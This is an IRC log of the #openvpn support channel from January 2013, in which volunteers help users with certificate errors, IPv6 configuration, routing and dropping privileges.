A HUP should fix that, which I suggested a few days ago that you tie into your distro's network post-connection script for the uplink interface 16:41 <+pekster> My suggestion still stands 16:41 -!- u0m3_ [~Radu@92.80.72.203] has quit [Ping timeout: 248 seconds] 16:46 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 17:04 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:05 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Remote host closed the connection] 17:15 -!- Orbi [~opera@anon-185-71.vpn.ipredator.se] has quit [Quit: Orbi] 17:18 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 260 seconds] 17:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 17:18 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:19 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 17:21 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 17:31 -!- dazo is now known as dazo_afk 17:34 < dvl> Late last week I installed FreeBSD 9.1 onto a gmirror, which I created during the install process. I documented it via photographs and comments. Hopefully, the next time I do this, it will be useful to refer to this resource. http://bit.ly/VW7bbN 17:34 < dvl> yeah, there's a lot of FreeBSD in here? speak up! 17:35 <+pekster> BSD has been jailed? Free BSD! 
:P 17:40 < dvl> Not bad 17:41 <+pekster> If I decide to remove the cork from one of my wine bottles the jokes might really start to go downhill ;) 17:42 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 17:42 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Quit: Leaving] 17:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 17:50 -!- b1rkh0ff [~b1rkh0ff@178.77.1.83] has quit [Ping timeout: 256 seconds] 17:52 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 18:26 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Read error: Operation timed out] 18:28 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 18:39 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 18:39 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 19:10 < EugeneKay> Mmmm beer 19:11 * pekster is torn between wine and beer 19:11 <+pekster> Although after fixing my initramfs up earlier, maybe wine is in order 19:12 <+pekster> It's always fun rebooting a box knowing that it'll either come back in a minute or two, or you'll spend the next 20 to 50 minutes with a RS232 cable sitting 2 meters from the box you just hosed ;) 19:15 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 19:16 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 19:24 < EugeneKay> My colo has three gateway boxes with keepalived to ensure it doesn't matter :-p 19:24 < EugeneKay> All of my backend boxes are ESXi with vMotion enabled, so the VMs don't care what they're running on. If one of them needs a reboot it's trivial to fix via the console 19:25 < EugeneKay> The only thing I really worry about is my NetApp SANs. 
I haven't gotten them running clustered quite yet(laziness), so I have to shut all of the VMs down on the one to be rebooted 19:25 < EugeneKay> Buut.... they never reboot. Ever. 19:26 < EugeneKay> One of these days I'll get a second power circuit dropped in and proper stacked switches. 19:26 < EugeneKay> But not this month 19:29 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 240 seconds] 19:30 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 19:40 -!- raidz is now known as raidz_away 19:40 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 19:40 -!- Guest88161 [Wintereise@113.11.122.231] has left #openvpn [] 19:41 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 19:44 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 20:09 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn 20:23 -!- Guest88161 [Wintereise@113.11.122.231] has joined #openvpn 20:23 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [Ping timeout: 244 seconds] 20:27 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 21:17 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 21:18 -!- Guest88161 [Wintereise@113.11.122.231] has quit [Ping timeout: 256 seconds] 22:12 -!- Wintereise [Wintereise@113.11.122.231] has quit [Ping timeout: 252 seconds] 22:21 -!- ngharo [~ngharo@shepard.sypherz.com] has quit [Ping timeout: 245 seconds] 22:21 -!- khem_ [~x@lotus.redl8.com] has quit [Ping timeout: 252 seconds] 22:22 -!- ngharo [~ngharo@shepard.sypherz.com] has joined #openvpn 22:22 -!- khem_ [~x@lotus.redl8.com] has joined #openvpn 22:25 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 240 seconds] 22:36 -!- khem_ [~x@lotus.redl8.com] has quit [Ping timeout: 248 seconds] 22:37 -!- khem_ [~x@lotus.redl8.com] has joined #openvpn 22:40 -!- uberushaximus [~uberushax@shepard.sypherz.com] has quit [Ping 
timeout: 240 seconds] 22:42 -!- uberushaximus [~uberushax@shepard.sypherz.com] has joined #openvpn 22:56 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] --- Day changed Tue Jan 22 2013 00:14 -!- iml_ [~iml@c-24-60-231-68.hsd1.ct.comcast.net] has joined #openvpn 00:14 < iml_> !welcome 00:14 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 00:14 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 00:41 -!- iml_ [~iml@c-24-60-231-68.hsd1.ct.comcast.net] has left #openvpn [] 00:49 -!- pekster [~rewt@openvpn/user/pekster] has quit [Quit: kernel upgrade] 00:49 -!- Otacon22 [~otacon22@isd-vpn.doshisha.ac.jp] has joined #openvpn 00:50 < Otacon22> Hi guys, I'm getting the "TLS Error: reading acknowledgement record from packet" error 00:50 < Otacon22> and I don't use tls-key on any client/server 00:51 < Otacon22> But actually I'm tunneling the openvpn connection inside a very slow udp connection 00:51 < Otacon22> if openvpn starts to send packets using a high rate, they may be dropped 01:05 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:09 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 256 seconds] 01:13 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 264 seconds] 01:13 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 01:14 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:14 -!- Qianyi 
[~Qianyi@180.155.14.35] has quit [Quit: Leaving] 01:24 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds] 01:28 -!- Minnebo_ [~Minnebo@office.exabyte.be] has joined #openvpn 01:31 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:39 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving] 01:43 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 01:50 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 01:54 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds] 02:01 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 02:11 -!- dydzEz2__ [~dydzEz2@2601:d:4a80:72:5d05:b2a0:d5f9:d9ad] has quit [Quit: Leaving] 02:21 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:22 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn 02:36 -!- dydzEz2 [~dydzEz2@2601:d:4a80:72:3cca:2357:4ff9:4c4f] has joined #openvpn 02:37 -!- AsadH is now known as zz_AsadH 02:54 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 02:55 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 248 seconds] 02:59 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 03:01 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 03:01 -!- mode/#openvpn [+o krzee] by ChanServ 03:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:07 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:15 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 03:17 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 03:21 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 248 seconds] 03:24 -!- dydzEz2 
[~dydzEz2@2601:d:4a80:72:3cca:2357:4ff9:4c4f] has quit [Quit: Leaving] 03:53 -!- Otacon22 [~otacon22@isd-vpn.doshisha.ac.jp] has quit [Ping timeout: 272 seconds] 04:10 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 04:10 -!- zz_AsadH is now known as AsadH 04:12 -!- defswork [~andy@141.0.50.105] has joined #openvpn 04:14 < AsadH> yo novaflash 04:14 < AsadH> novaflash novaflash 04:14 < AsadH> :( 04:15 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 04:26 -!- mXr [mxr@chello084112107202.24.11.vie.surfer.at] has joined #openvpn 04:26 < mXr> hello 04:26 < mXr> i have a strange issue with revocation of certificates, using openvpn 2.2.1 04:26 < mXr> anyone got an idea maybe... i have a certificate with a certain common name X 04:26 < mXr> it had the serial 08 04:27 < mXr> it got revoked, a long time later the person is supposed to get a new cert, so i created a new one with the same common name X, this time it got serial number 1A 04:27 < mXr> afaik revocation checks should be based on serial 04:27 < mXr> but apparently, openvpn checks against CN? because i cannot connect due to it "being revoked" even tho it certainly is not 04:28 < mXr> is it supposed to work like that? 04:30 -!- dazo_afk is now known as dazo 04:31 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 246 seconds] 04:35 -!- BtbN [~btbn@btbn.de] has joined #openvpn 04:37 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 04:38 -!- mXr [mxr@chello084112107202.24.11.vie.surfer.at] has quit [Remote host closed the connection] 04:39 -!- Orbi [~opera@anon-185-41.vpn.ipredator.se] has joined #openvpn 04:45 -!- b1rkh0ff [~b1rkh0ff@178.77.23.88] has joined #openvpn 04:47 -!- lazerbeak [~lazerbeak@unafffiliated/lazerbeak] has joined #openvpn 04:48 < lazerbeak> hi I have setup openvpn and it's connecting to my vpn, but windows is still using the old connection? 
04:55 -!- Mava [~Mava@ip-45-201.dhcp.opintanner.fi] has joined #openvpn 04:56 < Mava> if there is somebody who knows about stacked and chained, could you verify that: a stacked certificate is a collection of more than one certificate, and in a chain, each certificate is depending on its issuer. 04:56 < Mava> having again human error with this certificate stack and chain ideology =/ 05:24 <@dazo> Mava: https://community.openvpn.net/openvpn/wiki/Using_Certificate_Chains 05:24 <@vpnHelper> Title: Using_Certificate_Chains – OpenVPN Community (at community.openvpn.net) 05:33 < Mava> öer.. something that I remembered 05:33 < Mava> got to put that site to bookmarks etc. so that I can really find it again more easily =) 05:50 -!- AsadH is now known as zz_AsadH 05:55 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 06:09 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:13 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 06:13 -!- Minnebo__ [~Minnebo@office.exabyte.be] has joined #openvpn 06:15 -!- Mava [~Mava@ip-45-201.dhcp.opintanner.fi] has left #openvpn [] 06:16 -!- Minnebo_ [~Minnebo@office.exabyte.be] has quit [Ping timeout: 272 seconds] 06:18 -!- Minnebo__ [~Minnebo@office.exabyte.be] has quit [Ping timeout: 252 seconds] 06:31 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out] 06:41 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 06:46 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 06:49 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:51 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 07:20 -!- Vorik 
[~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 07:22 < Vorik> Hi! I've got an openvpn server on Centos6, Selinux permissive, installed with Puppet luxflux/puppet-openvpn module. I can ping the clients from the server and vice versa, but nothing (including server ip) from the LAN. I've added routes to the client and the default gateway of the LAN. ip_forward is enabled. What could be amiss? 07:24 < Vorik> Btw, it routed all my browser traffic via the LAN. 07:40 < Vorik> so, it generally works, (connections are routed over VPN) except I cannot access any hosts on the LAN itself. 07:48 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn 08:09 <@dazo> Vorik: check if you have enabled IP forwarding, then check your firewall ... and then your routing 08:09 <@dazo> Vorik: in 99.9999999% of all support cases, it's guaranteed to be one or more of those three points 08:09 < Vorik> dazo: I've enabled ip_forwarding on the openvpn server, firewall is disabled 08:10 <@dazo> Vorik: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting#Usingrouting ... the scenario here should basically be what's needed 08:10 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 08:10 <@dazo> Vorik: and "firewall is disabled" .... yeah, that's what everyone says too ;-) 08:11 < Vorik> dazo: lol :) 08:11 < Vorik> I'll check that doc, thanks 08:11 <@dazo> Vorik: however, you can most likely (at least if you run openvpn in server mode) put SELinux into Enforcing .... I'm running OpenVPN on CentOS5 and ScientificLinux 6 boxes in enforcing mode .... 
without any issues
08:12 < Vorik> i'll make a pastie of all configs
08:12 < Vorik> :)
08:12 <@dazo> goodie :)
08:12 * dazo heads out for lunch before a meeting
08:16 < Vorik> dazo: I've put it on http://pastie.org/5822775
08:29 -!- zu [~zu@ks387228.kimsufi.com] has joined #openvpn
08:43 -!- gustavoz [~gustavoz@host110.190-225-90.telecom.net.ar] has quit [Quit: Leaving]
08:49 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 252 seconds]
08:54 < MeanderingCode> Hey all. Is the Android client FLOSS?
08:54 -!- zu [~zu@ks387228.kimsufi.com] has quit [Remote host closed the connection]
08:56 -!- zu [~zu@ks387228.kimsufi.com] has joined #openvpn
08:57 -!- parmegv [U2FsdGVkX1@ma.sdf.org] has joined #openvpn
09:00 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 246 seconds]
09:08 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer]
09:12 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
09:14 -!- parmegv is now known as parmegv_
09:14 -!- parmegv_ is now known as parmegv
09:14 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn
09:18 -!- Minnebo__ [~Minnebo@office.exabyte.be] has joined #openvpn
09:21 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
09:32 -!- Wintereise [Wintereise@113.11.122.227] has joined #openvpn
09:35 -!- Wintereise [Wintereise@113.11.122.227] has quit [Changing host]
09:35 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn
09:38 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
09:42 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has quit [Quit: valparaiso]
10:03 -!- dazo is now known as dazo|afk
10:04 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 248 seconds]
10:07 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Read error: Connection reset by peer]
10:07 -!- d12fk [~heiko@exit0.net] has left #openvpn ["?RETURN WITHOUT GOSUB"]
10:13 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds]
10:15 < Martin`> I upgraded ubuntu to 12.04 so I was thinking 2.3.x will be in packages, but no luck with that :(
10:16 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
10:16 < Martin`> hmm just released
10:16 < Martin`> :P
10:19 < Martin`> !goal
10:19 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
10:22 -!- master_of_master [~master_of@p57B5425D.dip.t-dialin.net] has quit [Ping timeout: 248 seconds]
10:24 -!- master_of_master [~master_of@p57B53EFA.dip.t-dialin.net] has joined #openvpn
10:25 -!- dazo|afk is now known as dazo
10:27 -!- raidz_away is now known as raidz
10:35 -!- Minnebo__ [~Minnebo@office.exabyte.be] has quit [Ping timeout: 252 seconds]
10:36 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
10:37 -!- raidz is now known as raidz_away
10:40 -!- raidz_away is now known as raidz
10:45 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn
11:00 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds]
11:11 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
11:13 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 245 seconds]
11:13 -!- BendIt [~ron@146-52-51-114-dynip.superkabel.de] has joined #openvpn
11:13 < BendIt> hey guys
11:15 < BendIt> just a short question to clarify that for me. openvpn supports ipv6 as of 2.3.0, so do i need an ipv4 address for each client also to get it working?
11:16 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 240 seconds]
11:17 <@dazo> BendIt: currently, yes, you do need an IPv4 pool as well ... the developer behind the IPv6 payload patches has it on his TODO list to fix this, but nothing ready yet
11:18 <@dazo> BendIt: but you don't have to route the IPv4 traffic if you don't need it ... just remove any "route" statements related to the IPv4 networking
11:18 < BendIt> ah ok. thanks. so it's planned that you won't need this anymore when it's done? :)
11:18 <@dazo> (and you can even block that IPv4 in your firewall)
11:18 <@dazo> BendIt: it's done sometime in the future ... that's as accurate as I can be right now
11:19 < BendIt> yeah, no problem, i can wait and i know, it's done when it's done
11:20 < BendIt> is there a sample config file for client and server available? i couldn't find one which shows a usable configuration with ipv6?
11:21 <@dazo> BendIt: http://www.greenie.net/ipv6/openvpn.html ... in addition to the man page, of course (it should all be there too)
11:21 <@vpnHelper> Title: Gert Döring - IPv6 Payload Patch for OpenVPN (at www.greenie.net)
11:21 <@dazo> (that's the docs from the patch contributor)
11:21 < BendIt> thank you so much dazu, i'll have a look ;)
11:22 < BendIt> dazo, sry
11:22 <@dazo> no worries!
11:38 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 244 seconds]
11:43 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn
11:45 -!- BendIt [~ron@146-52-51-114-dynip.superkabel.de] has quit [Quit: Verlassend]
11:47 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Read error: Operation timed out]
11:49 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
11:49 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
11:49 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
11:50 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn
11:57 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn
11:57 -!- zz_AsadH is now known as AsadH
11:57 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host]
11:57 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn
12:03 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
12:03 -!- mode/#openvpn [+v s7r] by ChanServ
12:16 -!- oconnore [~eric@38.111.17.138] has joined #openvpn
12:17 < oconnore> hi, I have an openvpn install and I am trying to add a new user. The user has a crt that has been signed with the same CA that the server crt was signed with, but I am getting "self signed certificate" error. It's not a self signed certificate! What could be going wrong?
12:19 < oconnore> I have checked the fingerprints of the ca.crt files on both server and client, and they match
12:19 < oconnore> I have checked that the server crt verifies with that CA. I have checked that the client crt verifies with that CA.
12:19 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn
12:20 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 276 seconds]
12:23 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
12:30 <@dazo> oconnore: double check your certificates ... with openssl and grep you can do this: openssl x509 -noout -text -in | egrep "Issuer:|Subject:"
12:31 <@dazo> if you do this on the client cert .... you should see two lines, Issuer: and Subject: ... and they should be different
12:32 <@dazo> If the contents of these two lines are basically identical, then you've done something wrong
12:32 <@dazo> (openvpn doesn't complain about self-signed certificates without a reason)
12:36 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
12:37 < jackbrown> If I use a main proxy in my configuration and then connect to a VPN, what will the VPN see? My proxy IP or my machine IP?
12:48 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Read error: Connection reset by peer]
13:03 <@dazo> jackbrown: if your VPN client connects via a proxy, the VPN server will see the IP of your proxy
13:03 < jackbrown> ok
13:19 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
13:21 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn
13:28 < oconnore> dazo: thanks, my colleague's vpn client made a private copy of the configuration directory, so the certs that I was checking were not being loaded.
13:29 -!- dazo is now known as dazo_afk
13:36 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Read error: Operation timed out]
13:36 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds]
13:37 -!- mdw [~mdw@81.171.97.233] has joined #openvpn
13:38 -!- oconnore [~eric@38.111.17.138] has left #openvpn []
13:45 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit []
13:45 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn
13:46 -!- mdw [~mdw@81.171.97.233] has quit [Ping timeout: 276 seconds]
13:50 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn
14:17 -!- else- [~else@towely.iodev.org] has quit [Read error: Connection reset by peer]
14:22 -!- hilo [~helo@38.98.103.201] has joined #openvpn
14:22 < hilo> hello!
14:23 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Remote host closed the connection]
14:29 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn
14:30 -!- Orbi [~opera@anon-185-41.vpn.ipredator.se] has left #openvpn []
14:30 < hilo> Is anyone in here? I am trying to make use of the config lines "user nobody" and "group nogroup" to secure the process, but when I check the current processes, the process is still owned by "root"
14:33 -!- Minnebo__ [~Minnebo@78-23-254-38.access.telenet.be] has joined #openvpn
14:39 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds]
14:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
14:51 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has joined #openvpn
14:51 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has quit [Changing host]
14:51 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
15:01 < EugeneKay> The process is started as root but drops privileges to those users
15:02 < EugeneKay> !unpriv
15:02 <@vpnHelper> "unpriv" is see https://community.openvpn.net/openvpn/wiki/UnprivilegedUser for a write-up by EugeneKay on how to run OpenVPN without root/admin permissions.
15:02 < EugeneKay> There's a method to start it as an unprivileged user from the get-go, using sudo to perform the stuff that has to be run as root (ip addr, etc)
15:02 -!- b1rkh0ff [~b1rkh0ff@178.77.23.88] has quit [Quit: Leaving]
15:12 -!- brute11k [~brute11k@89.249.230.101] has quit [Quit: Leaving.]
15:14 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds]
15:45 -!- pekster [~rewt@openvpn/user/pekster] has joined #openvpn
15:45 -!- mode/#openvpn [+v pekster] by ChanServ
15:51 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
15:51 -!- Minnebo__ [~Minnebo@78-23-254-38.access.telenet.be] has quit [Ping timeout: 246 seconds]
15:51 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer]
15:53 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn
16:01 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
16:02 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
16:02 -!- Valcorb [~Valcorb@199.229.249.189] has quit []
16:15 -!- lazerbeak [~lazerbeak@unafffiliated/lazerbeak] has quit [Quit: Leaving]
16:19 < Martin`> hmm, nice compiled openvpn, removed package, changed openvpn init.d and all services are up and running again :D
16:19 * Martin` is happy
16:19 < Martin`> :P
16:19 < Martin`> now I need to find out how ipv6 works :)
16:22 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:26 < hilo> EugeneKay, so the process shows as root even after dropping privs?
16:26 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
16:27 < hilo> EugeneKay, is there a way to test that the privs have actually been dropped? and is there any info you can share for running unpriv with sudo?
16:29 < EugeneKay> hilo - the logs should say that the privs were dropped
16:29 < Martin`> only topology subnet supported? :S
16:29 < EugeneKay> hilo - all the info I have is in the link given :-p
16:29 < EugeneKay> Martin` - anything else is a sure path to insanity
16:29 <+pekster> hilo: Shows where running as root? If I drop privs via '--user' it shows the right UID in top/htop for the process
16:30 < Martin`> EugeneKay: how do you mean?
16:30 < EugeneKay> /30 sucks
16:30 < Martin`> I use a /64
16:30 < EugeneKay> Oh, v6 on 2.3. Haven't played with that.
16:31 < Martin`> server-ipv6 2001:16f8:6:1201::/64
16:31 < Martin`> I guess that is right? or not?
16:31 < EugeneKay> Using anything other than a subnet in v6 is stupid :-p
16:31 < EugeneKay> Looks right
16:31 <+pekster> EugeneKay: PtP is still a valid configuration in IPv6
16:31 < EugeneKay> It's still a stupid one
16:32 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit []
16:32 <+pekster> If you only need to link 2 servers (eg: routers functioning as a corporate WAN link) then PtP is a much simpler solution
16:32 <+pekster> It's not for the "traditional" multi-client -> one server usecase, but OpenVPN isn't a one-size-fits-all program :P
16:33 < EugeneKay> /64s are cheap. Use a whole one for your 1-client link.
16:34 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Read error: Connection reset by peer]
16:34 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
16:34 <+pekster> Or create this many PtP links in that same IP space: 9.223372036854776e+18 ;)
16:35 < EugeneKay> I forget the RFC#, but I'm fairly sure you're not supposed to break up a network (even if it's two boxen) smaller than a /64
16:35 < EugeneKay> That's the whole point of v6 - one subnet size
16:35 < EugeneKay> And lots of em!
16:38 < Martin`> topology subnet fixed the problem
16:38 < Martin`> and it is working :D
16:38 <+pekster> net30 was a solution before subnet was available for tun to fake Windows tun links
16:38 <+pekster> It's not necessary since 2.2
16:39 < hilo> pekster, EugeneKay, it shows as root in top/htop but the logs show that it dropped privs after startup
16:39 <+pekster> Or 2.1? "a while ago" anyway
16:39 < Martin`> but standard is net30?
16:39 <+pekster> Martin`: It's the default for backwards-compat purposes
16:39 < Martin`> ok
16:39 <+pekster> If you had a 2.0.9 client, for example, it wouldn't support subnet
16:39 <+pekster> solution: don't run anchient clients ;)
16:39 <+pekster> ancient*
16:39 < Martin`> hmm it uses the internal ipv6 address instead of the one via tunnel :(
16:40 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
16:40 <+pekster> Then fix the app sending data through the tunnel to bind/source from the proper IP
16:40 <+pekster> That needs to happen on any multi-homed PC
16:41 * Martin` turns off wifi on his iphone
16:41 <+pekster> hilo: What distro?
16:41 < Martin`> yes it works now :P
16:42 < hilo> pekster, Ubuntu 12.04 server 64-bit
16:42 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
16:42 * Martin` is happy finally openvpn is available for the iphone :)
